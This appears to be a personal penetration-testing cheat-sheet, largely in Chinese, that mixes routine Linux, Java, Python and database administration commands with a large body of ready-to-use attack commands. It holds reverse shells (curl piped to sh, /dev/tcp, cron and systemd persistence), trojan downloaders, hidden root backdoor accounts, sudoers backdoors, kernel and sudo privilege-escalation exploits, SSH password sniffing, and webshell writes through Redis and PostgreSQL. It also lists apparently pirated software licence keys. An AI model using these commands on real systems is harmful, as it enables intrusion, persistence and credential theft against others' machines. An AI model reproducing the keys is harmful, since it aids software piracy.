ufw allow 22
ufw delete allow 22
ufw enable
ufw disable
ufw status
seq -w 0000 9999 >list.txt  //生成4位数字列表0000-9999
seq 10080 10089 >list.txt  //生成5位固定格式数字列表10080-10089

XKZYV-PK9CC-A1Y0X-K5HZL-Y65ZV
7HYY8-Z8WWY-F1MAN-ECKNY-LUXYX
ZTVXW-VRAG9-D1WUR-XLQCT-VV5XX
G0ZQR-GRGYE-G1V8Z-AT9E0-6KNGV
RHZP8-V2QKE-Z1ZPQ-QFUET-Q7QZZ

FY102-4UF13-088AP-KWWGZ-WLKW2
ZV30K-66Z8K-M84VY-0DMZG-NG88D
GG352-DMD01-481TQ-NEQQC-QGK96
ZG70H-80F9L-489QP-ZYPQE-X20Y2
AZ3EH-6PD8N-08D1Q-3DWZZ-XPHUA
VY780-A7XE6-0806P-LWM7T-ZPUV6

YZ718-4REEQ-08DHQ-JNYQC-ZQRD0

ZF3R0-FHED2-M80TY-8QYGC-NPKYF
YF390-0HF8P-M81RQ-2DXQE-M2UT6
ZF71R-DMX85-08DQY-8YMNC-PPHV8

#PermitRootLogin prohibit-password
PermitRootLogin yes
#PasswordAuthentication yes
PasswordAuthentication yes

auto eth0	//自动启动eth0网卡
iface eth0 inet static	//静态获取IP
address x.x.x.x	//固定ip地址，根据实际情况填写
netmask x.x.x.x	//子网掩码，根据实际情况填写
gateway x.x.x.x	//网关，根据实际情况填写

nameserver 114.114.114.114
nameserver 8.8.8.8

sudo rm -rf ~/.local/share/Trash/*

https://www.oracle.com/in/java/technologies/downloads/ // 下载jdk8
sudo mkdir -p /usr/lib/jvm  //为 JDK 创建一个目录
sudo tar zxvf jdk-version-linux-x64.tar.gz -C /usr/lib/jvm  //提取 tarball 并安装 JDK
sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_ version/bin/java" 1  //告诉系统有可用的新 Java 版本
注意：如果从手动删除的先前版本更新，请执行上述命令两次，因为第一次会收到错误消息。
sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_version/bin/java  //将新JDK设置为默认值
sudo update-alternatives --config java  //jdk多版本切换

#列出适用于Apple Silicon Mac的所有MacOS固件：
mist list firmware

#列出所有可用于英特尔Mac的MacOS安装程序，
#包括MacOS Big Sur及更高版本的通用安装程序：
mist list installer

#下载最新MacOS Ventura固件。
#Apple Silicon Mac，自定义名称：
mist download firmware "macOS Ventura" --firmware-name "Install-%NAME%-%VERSION%-%BUILD%.ipsw"

#下载用于英特尔Mac的特定MacOS安装程序版本，
#包括MacOS Big Sur及更高版本的通用安装程序，
#并使用自定义名称生成磁盘镜像：
mist download installer "13.0.1" image --image-name "Install-%NAME%-%VERSION%-%BUILD%.dmg"

#下载用于英特尔Mac的最新MacOS Ventura安装程序，
#包括MacOS Big Sur及更高版本的通用安装程序，
#可引导磁盘镜像：
mist download installer "13.0.1" iso --iso-name "Install-%NAME%-%VERSION%-%BUILD%.iso"

javap -verbose Sample.class | grep major  //Linux、MacOS
javap -verbose Sample.class | findstr major //Windows

https://www.python.org/ftp/python/2.7.9/python-2.7.9.amd64.msi
https://www.python.org/ftp/python/3.10.7/python-3.10.7-amd64.exe

pip install pipreqs
pipreqs . --force

python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

匹配32位MD5的正则表达式：[a-zA-Z0-9]{32}
匹配双字节字符(包括汉字在内)：[^\x00-\xff]
匹配删除空行：^[ \t]*\n
匹配首尾空白字符的正则表达式：^\s*|\s*$
IP地址：([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})
匹配Email地址的正则表达式：\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*
匹配手机号：[1](([3][0-9])|([4][5-9])|([5][0-3,5-9])|([6][5,6])|([7][0-8])|([8][0-9])|([9][1,8,9]))[0-9]{8}
删除查找替换记录：若要清空，就直接按住Alt+Del不松，便可清空查找历史
清除emeditor打开记录：点“工具”->“自定义”，然后在弹出的窗口中点“历史”，再点“清除历史”

[一-龥]	//匹配中文

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.28701.123
MinimumVisualStudioVersion = 10.0.40219.1

定义
Microsoft Visual Studio Solution File, Format Version 12.00
定义文件格式版本的标准标头。

# Visual Studio Version 16
最近一次Visual Studio保存 (文件) 版本。 此信息控制解决方案图标中的版本号。

VisualStudioVersion = 16.0.28701.123
最近一次Visual Studio保存 (的完整) 版本。 如果解决方案文件由具有相同主Visual Studio版本的较新版本保存，则此值不会更新，以减少该文件中的改动。

MinimumVisualStudioVersion = 10.0.40219.1
可以 (此解决方案) Visual Studio版本的最低版本。

MSVC++ 6.0   _MSC_VER == 1200 (Visual Studio 6.0 version 6.0)
MSVC++ 7.0   _MSC_VER == 1300 (Visual Studio .NET 2002 version 7.0)
MSVC++ 7.1   _MSC_VER == 1310 (Visual Studio .NET 2003 version 7.1)
MSVC++ 8.0   _MSC_VER == 1400 (Visual Studio 2005 version 8.0)
MSVC++ 9.0   _MSC_VER == 1500 (Visual Studio 2008 version 9.0)
MSVC++ 10.0  _MSC_VER == 1600 (Visual Studio 2010 version 10.0)
MSVC++ 11.0  _MSC_VER == 1700 (Visual Studio 2012 version 11.0)
MSVC++ 12.0  _MSC_VER == 1800 (Visual Studio 2013 version 12.0)
MSVC++ 14.0  _MSC_VER == 1900 (Visual Studio 2015 version 14.0)
MSVC++ 14.1  _MSC_VER == 1910 (Visual Studio 2017 version 15.0)
MSVC++ 14.2  _MSC_VER == 1920 (Visual Studio 2019 Version 16.0)
MSVC++ 14.3  _MSC_VER == 1930 (Visual Studio 2022 Version 17.0)

Visual Studio Professional 2010 YCFHQ-9DWCY-DKV88-T2TMH-G7BHP
Visual Studio Professional 2012 4D974-9QX42-9Y43G-YJ7JG-JDYBP
Visual Studio Professional 2013 XDM3T-W3T3V-MGJWK-8BFVD-GVPKY
Visual Studio Professional 2015 HMGNV-WCYXV-X7G9W-YCX63-B98R2
Visual Studio Professional 2017 KBJFW-NXHK6-W4WJM-CRMQB-G3CDH
Visual Studio Professional 2019 NYWVH-HT4XC-R2WYW-9Y3CM-X4V3Y
Visual Studio Professional 2022 TD244-P4NB7-YQ6XK-Y8MMM-YWV2J

./gost -L=:1080	//作为标准HTTP/SOCKS5代理
./gost -L=admin:123456@:1080	//设置代理认证信息
./gost -L=http2://:443 -L=socks5://:1080 -L=ss://aes-128-cfb:123456@:8338	//多端口监听
nohup ./gost -L=:1080 > /dev/null 2>&1 &	//后台运行不记录日志
nssm.exe install
Path：选择gost.exe
Statup directory:自动添加路径地址
Arguments：参数设置-L=:1080
Service name：设置gost 点击Install service
nssm.exe start gost
nssm.exe edit gost

./ngrok tcp 192.168.0.225:445

nohup python s5.py 1080 &	//后台运行s5.py
nohup ./ngrok tcp 1080 -log=stdout &	//后台运行ngrok，此处必须加入-log=stdout参数

./ngrok tcp 1080 -config /tmp/.ngrok2/ngrok.yml

curl https://reverse-shell.sh/yourip:1337 | sh

or

while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done

echo base64后的木马内容 |base64 -d > 360.jsp

nc -l 23456 | tar xvzf - // 本地监听和接受文件
tar cvzf - "文件名或者目录" | nc x.x.x.x 23456 // 压缩文件或目录传输
或
nc -l -p 4444 < /tool/file.exe	//本地发送
nc $ATTACKER 4444 > file.exe	//远程接受

python2的用法如下:
 
python -m SimpleHTTPServer

python3的用法如下: 

python3 -m http.server --cgi

以上两种方法默认端口8000，可以制定端口，例如指定端口45678: 

python -m SimpleHTTPServer 45678 

python3 -m http.server --cgi 45678

在命令的开头加一个nohup，忽略所有的挂断信号，如果当前bash关闭，则当前进程会挂载到init进程下，成为其子进程，这样即使退出当前用户，其45678端口也可以使用。

nohup python -m SimpleHTTPServer 45678 &
python -m pyftpdlib -p 2121	//开启简单ftp功能

wget http://soft.vpser.net/web/nginx/nginx-0.8.0.tar.gz	//文件下载
wget -c http://soft.vpser.net/web/nginx/nginx-0.8.0.tar.gz	//断点续传
wget -b http://soft.vpser.net/web/nginx/nginx-0.8.0.tar.gz	//后台下载
wget -O /home/ http://soft.vpser.net/web/nginx/nginx-0.8.0.tar.gz	//文件另存为（文件名或路径）
wget --http-user=youuser --http-passwd=youpassword http://soft.vpser.net/web/nginx/nginx-0.8.0.tar.gz	//基础认证
wget --no-check-certificate https://soft.vpser.net/web/nginx/nginx-0.8.0.tar.gz	//https协议下载
wget -c -r -np -k -L -p http://soft.vpser.net/web/	//全站web目录下载

curl -O https://nchc.dl.sourceforge.net/project/ssocks/ssocks-0.0.14.tar.gz	//将文件保存到本地
curl -k -O https://nchc.dl.sourceforge.net/project/ssocks/ssocks-0.0.14.tar.gz	//下载https的网站将文件保存到本地
curl -o ssocks.tar.gz https://nchc.dl.sourceforge.net/project/ssocks/ssocks-0.0.14.tar.gz	//将文件保存到本地并保存为ssocks.tar.gz
curl -C - https://nchc.dl.sourceforge.net/project/ssocks/ssocks-0.0.14.tar.gz	//断点续传下载文件

scp -P 2222 [email protected]:/root/lnmp0.4.tar.gz /home/lnmp0.4.tar.gz	//获取远程服务器上的文件

scp -P 2222 -r [email protected]:/root/lnmp0.4/ /home/lnmp0.4/	//获取远程服务器上的目录

scp -P 2222 /home/lnmp0.4.tar.gz [email protected]:/root/lnmp0.4.tar.gz	//将本地文件上传到服务器上

scp -P 2222 -r /home/lnmp0.4/ [email protected]:/root/lnmp0.4/	//将本地目录上传到服务器上

端口P大写为参数，2222 表示更改SSH端口后的端口，如果没有更改SSH端口可以不用添加该参数。-r 参数表示递归复制（即复制该目录下面的文件和目录）

[email protected] 表示使用root用户登录远程服务器www.vpser.net，:/root/lnmp0.4/ 表示远程服务器上的目录

curl -A O -o- -L http://x.x.x.x/a | bash -s

mkdir /tmp/.qHFnC; rm -f /tmp/.qHFnC/uiRaBszrxF; curl -A O -L http://x.x.x.x/pKfsMhgjeh -o /tmp/.qHFnC/uiRaBszrxF; chmod 755 /tmp/.qHFnC/uiRaBszrxF; /tmp/.qHFnC/uiRaBszrxF; sleep 20; rm -rf /tmp/.qHFnC/uiRaBszrxF

上传
curl -k --upload-file 文件 https://transfer.sh/文件名
curl -k --upload-file /root/hello.txt https://transfer.sh/hello.txt
下载
https://transfer.sh/get/1TghfFb/hello.txt

ftp -i -n <<!
open 10.x.x.x
user yourFtpAccount yourPasswd
cd /root/DailyBuild/webapps/
delete xxx.war
lcd /home/product/1.0.2-SNAPSHOT/webapps

binary
mput xxx.war
bye
!

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs
echo Post.Open "GET","http://x.x.x.x/muma.exe",0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile "c:\zl.exe",2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run ("c:\zl.exe") >>zl.vbs

cmd.exe /c bitsadmin /transfer f370 http://x.x.x.x/as %APPDATA%\f370.exe&%APPDATA%\f370.exe&del %APPDATA%\f370.exe
certutil.exe -urlcache -split -f https://x.x.x.x/version.txt   file.txt
HH.exe http://x.x.x.x/test.exe c:\\test.exe	//适用于sqltools

tcpdump -i eth1 -s0 -w tcpdump.pcap	//指定网卡，-s0会将大小设置为无限制-如果您要捕获所有流量，请使用此大小。如果要从网络流量中提取二进制文件/文件，则需要。-w保存文件
tcpdump -i eth1 src host 192.168.1.1 -w tcpdump.pcap	//指定源地址
tcpdump -i eth1 dst host 192.168.1.1 -w tcpdump.pcap	//指定目的地址
tcpdump -i eth1 port 25	-w tcpdump.pcap //抓取所有经过 eth1，目的或源端口是 25 的网络数据
tcpdump -i eth1 -s 0 -A -vv 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' -w tcpdump.pcap	//抓取get请求
tcpdump -i eth1 -s 0 -A -vv 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354' -w tcpdump.pcap //抓取post请求
tcpdump -i eth1 -nn -A -s0 -l -w tcpdump.pcap | egrep -i 'Set-Cookie|Host:|Cookie:'	//抓取cookie
tcpdump -i eth1 -s 0 -A -n -l -w tcpdump.pcap | egrep -i "POST /|GET /|pwd=|passwd=|password=|os_password=|user[password]=|Host:"	//抓取post/get明文密码
tcpdump -p -vv -s 0 -w tcpdump.pcap	//不指定网卡嗅探
tcpdump -i any -s 0 -w tcpdump.pcap	//当机器有多个网卡，不确定流量走哪个时，使用这个选项

tcpdump -r <input_pcap> -w <output_pcap> -C <file_size>	//input_pcap是您要拆分的文件的名称，output_pcap是输出，而<file_size>是拆分文件的近似大小以兆字节为单位。
tcpdump -r input_packet_capture.pcap -w output_packet_capture.pcap -C 25	//将文件拆分为约25mb的块

useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof

// 命令解释

useradd 添加用户

-p `openssl passwd -1 -salt 'lsof' admin` 这个里面的指的是设置用户的密码，里面的lsof差不多是密钥之类的，可以随便写， admin是明文密码

-u 0 -o 添加一个uid为 0的用户 就相对于root级别的了

-g root -G root 将用户添加到root组

-s /bin/bash 指定新建用户的shell路径

-d /usr/bin/lsof 新建用户的主目录，可以自己定义

lsof 新建的用户的用户名

curl -O https://access.redhat.com/sites/default/files/rh-cve-2016-5195_3.sh && chmod +x rh-cve-2016-5195_3.sh

./rh-cve-2016-5195_3.sh && rm -f rh-cve-2016-5195_3.sh	//脏牛漏洞检测
或
curl -O https://raw.githubusercontent.com/aishee/scan-dirtycow/master/dirtycowscan.sh  && chmod +x dirtycowscan.sh

./dirtycowscan.sh && rm -f dirtycowscan.sh	//脏牛漏洞检测，适用redhat、ubuntu等

curl -O https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c //下载

gcc -pthread dirty.c -o dirty -lcrypt	//编译

./dirty or ./dirty my-new-password	//运行，默认账号firefart

python -c 'import pty; pty.spawn("/bin/bash")' 	//获得标准交互式shell

su firefart	//交互式登陆

mv /tmp/passwd.bak /etc/passwd	//提权添加后门后还原/etc/passwd

curl -O https://access.redhat.com/sites/default/files/cve-2021-3156--2021-02-01-1206.sh && chmod +x cve-2021-3156--2021-02-01-1206.sh
./cve-2021-3156--2021-02-01-1206.sh && rm -f cve-2021-3156--2021-02-01-1206.sh
访问exp
https://github.com/blasty/CVE-2021-3156

gcc -Wall -o linux-sendpage linux-sendpage.c	//i386
gcc -Wall -m64 -o linux-sendpage linux-sendpage.c	//x86_64

wget --no-check-certificate https://github.com/gbonacini/CVE-2016-5195/archive/master.zip	//下载

unzip master.zip && cd CVE-2016-5195-master/

make	//编译

./dcow -h	//查看帮助说明

./dcow -s	//强制密码"dirtyCowFun"（SHA-512）。在成功执行的情况下，使用该密码执行"su"操作，则可以使用root shell。使用-s选项（建议）

$ wget www.tux-planet.fr/public/hack/exploits/kernel/mempodipper.c
$ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami
root

$ wget https://raw.githubusercontent.com/realtalk/cve-2013-2094/master/semtex.c
$ gcc -O2 semtex.c
$ ./a.out

 * For i386 and ppc, compile with the following command:
 * gcc -Wall -o linux-sendpage linux-sendpage.c
 *
 * And for x86_64 and ppc64:
 * gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
 
wget --no-check-certificate https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2692/2.6.18.c

wget --no-check-certificate https://github.com/xpn/ssh-inject/archive/master.zip && unzip master.zip && cd ssh-inject-master 	//下载解压文件并进入目录
make	//编译
ps aux | grep sshd	//查看sshd服务进程id
./run.sh xxx	//注入id进程获取ssh登陆用户密码

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers

# use SUDO without password
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers

(crontab -l;printf "* * * * *  /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"x.x.x.x\",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n")|crontab -

sudo find /etc/passwd -exec /bin/sh \;
sudo find /bin -name nano -exec /bin/sh \;

sudo vim -c '!sh'

sudo nmap --interactive
nmap> !sh
sh-4.1#

注意：nmap -interactive选项在最新的nmap中不可用

echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse //没有交互的最新方式

sudo man man

sudo less /etc/hosts
sudo more /etc/hosts

sudo awk 'BEGIN {system("/bin/sh")}'

sudo nano /etc/passwd

su touhid

sudo wget http://192.168.56.1:8080/passwd -O /etc/passwd

su touhid

sudo wget --post-file=/etc/shadow 192.168.56.1:8080

sudo apache2 -f /etc/shadow

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root	//新建文件/tmp/.test，把命令写进/tmp/.test比如"id"

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "bash -i >& /dev/tcp/x.x.x.x/4444 0>&1"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
export HISTFILE=/dev/null && echo "*/1 * * * * (cd /tmp && curl x.x.x.x/x.txt -o zabbix && chmod +x zabbix && ./zabbix)|sh" | crontab -
crontab -r
或
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "bash -i >& /dev/tcp/x.x.x.x/4444 0>&1"
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF
export HISTFILE=/dev/null && echo "*/1 * * * * (cd /tmp && curl x.x.x.x/x.txt -o zabbix && chmod +x zabbix && ./zabbix)|sh" | crontab -
crontab -r

cd /etc; Xorg -fp "root::16431:0:99999:7:::"  -logfile shadow  :1;su

#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root. 
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD.
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back 
echo [+] type 'Password1' and hit enter for root
su -

gcc chocobo_root.c -o chocobo_root -lpthread
./chocobo_root

4.4.0-46-generic #67~14.04.1
4.4.0-47-generic #68~14.04.1
4.2.0-41-generic #48
4.8.0-22-generic #24
4.2.0-34-generic #39
4.2.0-30-generic #36
4.2.0-16-generic #19
4.2.0-17-generic #21
4.2.0-18-generic #22
4.2.0-19-generic #23~14.04.1
4.2.0-21-generic #25~14.04.1
4.2.0-30-generic #36~14.04.1
4.2.0-27-generic #32~14.04.1
4.2.0-36-generic #42
4.4.0-22-generic #40
4.2.0-18-generic #22~14.04.1
4.4.0-34-generic #53
4.2.0-22-generic #27
4.2.0-23-generic #28
4.2.0-25-generic #30
4.4.0-36-generic #55
4.2.0-42-generic #49
4.4.0-31-generic #50
4.4.0-22-generic #40~14.04.1
4.2.0-38-generic #45
4.4.0-45-generic #66
4.2.0-36-generic #42~14.04.1
4.4.0-45-generic #66~14.04.1
4.2.0-22-generic #27~14.04.1
4.2.0-25-generic #30~14.04.1
4.2.0-23-generic #28~14.04.1
4.4.0-46-generic #67
4.4.0-47-generic #68
4.4.0-34-generic #53~14.04.1
4.4.0-36-generic #55~14.04.1
4.4.0-31-generic #50~14.04.1
4.2.0-38-generic #45~14.04.1
4.2.0-35-generic #40
4.4.0-24-generic #43~14.04.1
4.4.0-21-generic #37
4.2.0-34-generic #39~14.04.1
4.4.0-24-generic #43
4.4.0-21-generic #37~14.04.1
4.2.0-41-generic #48~14.04.1
4.8.0-27-generic #29
4.8.0-26-generic #28
4.4.0-38-generic #57
4.4.0-42-generic #62~14.04.1
4.4.0-38-generic #57~14.04.1
4.4.0-49-generic #70
4.4.0-49-generic #70~14.04.1
4.2.0-21-generic #25
4.2.0-19-generic #23
4.2.0-42-generic #49~14.04.1
4.4.0-43-generic #63
4.4.0-28-generic #47
4.4.0-28-generic #47~14.04.1
4.9.0-1-generic #2
4.8.0-28-generic #30
4.2.0-35-generic #40~14.04.1
4.2.0-27-generic #32
4.4.0-42-generic #62
4.4.0-51-generic #72

wget https://raw.githubusercontent.com/jas502n/CVE-2019-13272/master/CVE-2019-13272.c
gcc -s CVE-2019-13272.c -o pwned

#!/bin/bash

while true; do
   ps_test=`ps ax|grep sshd|grep -v grep|grep priv|tr -s ' '`
   if [ -n "$ps_test" ]
   then
     f=$RANDOM
     a="output$RANDOM.log"
     strace -e trace=read -p $(echo $ps_test | awk '{print $1}') -o $f
     cat $f | grep 'read(6,' > $a
     rm $f
     chown root:root $a
     chmod 600 $a
   else
     echo -e ".\c"
     sleep 0.1
   fi
done

sudo -u#-1 id -u
或
sudo -u#4294967295 id -u

perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id

while :; do ./lucky0 -q && break; done
sudo -s

config set dir /home/wwwroot/default/	//设置路径
config set dbfilename redis.php	  //设置文件名
set webshell "<?php @eval($_POST['chopper']);?>"	//写入后门代码
set webshell "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"chopper\"],\"unsafe\");%>"	//aspx，注意双引号使用\
set webshell "<%eval request(\"chopper\")%>"	//asp，注意双引号使用\
save	//保存

python3 redis-rce.py -r 192.168.1.16 -L 192.168.1.107 -f exp.so
RedisDesktopManager连接控制台执行
system.exec "id"
写反弹脚本
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNi4xMjkvOTk5OSAwPiYx |base64 -d > a

drop table pwn;
create table pwn(t TEXT);
copy pwn from '/etc/passwd';
select *from pwn limit 1 offset 0;
drop table pwn;

drop table pwn;
create table pwn (t TEXT);
insert into pwn(t) values ('<?php @system("$_GET[cmd]");?>');
select * from pwn;
copy pwn(t) to  '/tmp/cmd.php';
drop table pwn;
或
copy  (select '<?php phpinfo();?>') to '/tmp/1.php';

sudo -u postgres psql
psql -U dbuser -d exampledb -h 127.0.0.1 -p 5432

\password           设置密码。
\q                  退出。
\h                  查看SQL命令的解释，比如\h select。
\?                  查看psql命令列表。
\l                  列出所有数据库。
\c [database_name]  连接其他数据库。
\d                  列出当前数据库的所有表格。
\d [table_name]     列出某一张表格的结构。
\du                 列出所有用户。
\e                  打开文本编辑器。
\conninfo           列出当前数据库和连接的信息。
SELECT first_name FROM customer;//查询表指定字段
SELECT id,user,pass FROM customer;	//查询表多个指定字段
COPY (select * from users) to '/tmp/users.csv' with csv header; //导出表

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

echo 'hello';

'echo "hello";'

mysqldump -uroot -ptecmint rsyslog> rsyslog.sql	//备份单个MySQL数据库
mysqldump -uroot -ptecmint --databases rsyslog syslog> rsyslog_syslog.sql	//备份多个MySQL数据库
mysqldump -uroot -ptecmint --all-databases> all-databases.sql	//备份所有数据库
mysqldump -uroot -ptecmint --no-data rsyslog> rsyslog_structure.sql	//仅备份MySQL数据库结构
mysqldump -uroot -ptecmint --no-create-db --no-create-info rsyslog> rsyslog_data.sql	//仅备份MySQL数据库数据
mysqldump -uroot -ptecmint wordpress wp_posts> wordpress_posts.sql	//备份单表数据库
mysqldump -uroot -ptecmint wordpress wp_posts wp_comments> wordpress_posts_comments.sql	//备份多个数据库表
mysqldump -uroot -ptecmint -C products> products.sql.tgz	//tar压缩备份
mysqldump -uroot -ptecmint products | gzip > products.sql.gz	//gzip压缩备份
mysqldump -uroot -ptecmint products --skip-lock-tables | gzip > products.sql.gz	//gzip压缩备份。如果出现"when using LOCK TABLES",解决办法是加上"--skip-lock-tables"
mysqldump --opt -u root --password=tecmint -h127.0.0.1 products > D:\products.sql	//--opt代表激活了Mysqldump命令的quick，add-drop-table，add-locks，extended-insert，lock-tables
mysql -uroot -ptecmint rsyslog <rsyslog.sql	//恢复单个MySQL数据库
tar xfzO products.sql.tgz | mysql -uroot -ptecmint products	//tar恢复单个MySQL数据库
gunzip <products.sql.gz | mysql -uroot -ptecmint products	//gunzip恢复单个MySQL数据库
mysqlimport -uroot -ptecmint rsyslog <rsyslog.sql	//如果要还原目标计算机上已存在的数据库，则需要使用mysqlimport命令

show slave status	//查看master ip地址

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '' WITH GRANT OPTION;	//MYSQL开启外链语句
GRANT ALL PRIVILEGES ON *.* TO ‘myuser’@'192.168.1.104′ IDENTIFIED BY ‘admin123′  WITH GRANT OPTION;	//MYSQL设置指定IP外链语句
DELETE FROM `mysql`.`user` WHERE  `Host`='%' AND `User`='root'; //删除外链

create table test (cmd text); 
load data infile "C:/Windows/win.ini" into table test FIELDS TERMINATED BY '\n';
load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
或
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
load data local infile "C:/Windows/win.ini" into table test FIELDS TERMINATED BY '\n';

mysql> show variables like '%plugin%'; 或 select @@plugin_dir;
+---------------+-------------------------+
| Variable_name | Value                   |
+---------------+-------------------------+
| plugin_dir    | /usr/lib64/mysql/plugin |
+---------------+-------------------------+
1 row in set (0.00 sec)

mysql> select * from func; #检查是否已经有人导出过了
mysql> select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000